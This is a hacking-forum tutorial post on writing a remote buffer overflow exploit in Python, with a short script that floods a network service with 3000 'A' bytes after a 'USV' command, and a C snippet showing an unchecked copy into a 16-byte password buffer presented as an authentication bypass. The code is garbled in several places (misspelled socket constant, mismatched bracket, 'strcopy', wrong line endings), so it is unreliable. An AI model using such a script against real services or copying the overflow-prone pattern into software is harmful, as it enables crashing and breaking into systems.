www.i4info.org

Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2017
How to exploit remote buffer overflow with python EmptySat Apr 29, 2017 10:50 am by ubedullah

» Group hackers
How to exploit remote buffer overflow with python EmptySat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
How to exploit remote buffer overflow with python EmptySat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
How to exploit remote buffer overflow with python EmptySat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
How to exploit remote buffer overflow with python EmptyThu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
How to exploit remote buffer overflow with python EmptyTue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
How to exploit remote buffer overflow with python EmptyTue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
How to exploit remote buffer overflow with python EmptyTue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
How to exploit remote buffer overflow with python EmptyTue Apr 11, 2017 1:35 am by Group Hackers

May 2024

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


    How to exploit remote buffer overflow with python

    Admin
    Admin
    Admin

    Posts : 474
    Reputation : 8
    Join date : 2014-12-10
    Age : 31
    Location : Pakistan
    20160924

    How to exploit remote buffer overflow with python Empty How to exploit remote buffer overflow with python

    Post by Admin

    In this article we are going to perform the exploit overflowing the buffer from the client part of the computer.

    Step by Step Coding Remote Buffer Overflow Exploit with Python:


    for carg in sys.argv:

                if carg == “-s”:

                            argnum = sys.argv.index(carg)

                            argnum += 1

                            host = sys.argv[argnum]

                elif carg == “-p”:

                            argnum = sys.argv.index(carg)

                            argnum += 1

                            port = sys.argv[argnum[

    buffer = “\x41″* 3000

    s = socket.socket(socket.AF_INET, socket.SOCK_STRAEM)

    s.connect((host,port))

    s.send(“USV ” + buffer + “//r//n//r”)

    s.close()

    Code should look like this:

    buffer_overflow_exp1

    Now, lets analyze the code. We already know the argument indentification script from my previous tutorial.  The second line makes a buffer, that is \x41 multiplied 3000 times. Then we see the lines of declaring s as socket, connecting with it, sending the buffer and closing the socket. Looks pretty hard, but it isnt.

    After you have done these steps above, its time to test out our script!

    buffer_overflow_exp2

    This depends on programming language. As example, on C, you can be vulnerable to remote buffer overflow if you use code like this:

    int authed = 0;
    char password_buffer[16];
    strcopy(password_buffer, your_password)
    if (strcmp(password_buffer, password) == 0) {
    authed = 1;
    }
    else {
    authed = 0;
    }

    So, once the your_password is over 16, you can implement auth overflow, or if there are even more, you can get buffer overflow with segmentation fault error.

    Take your time to comment on this article.
    Share this post on: reddit

    No Comment.


      Current date/time is Mon May 13, 2024 10:28 am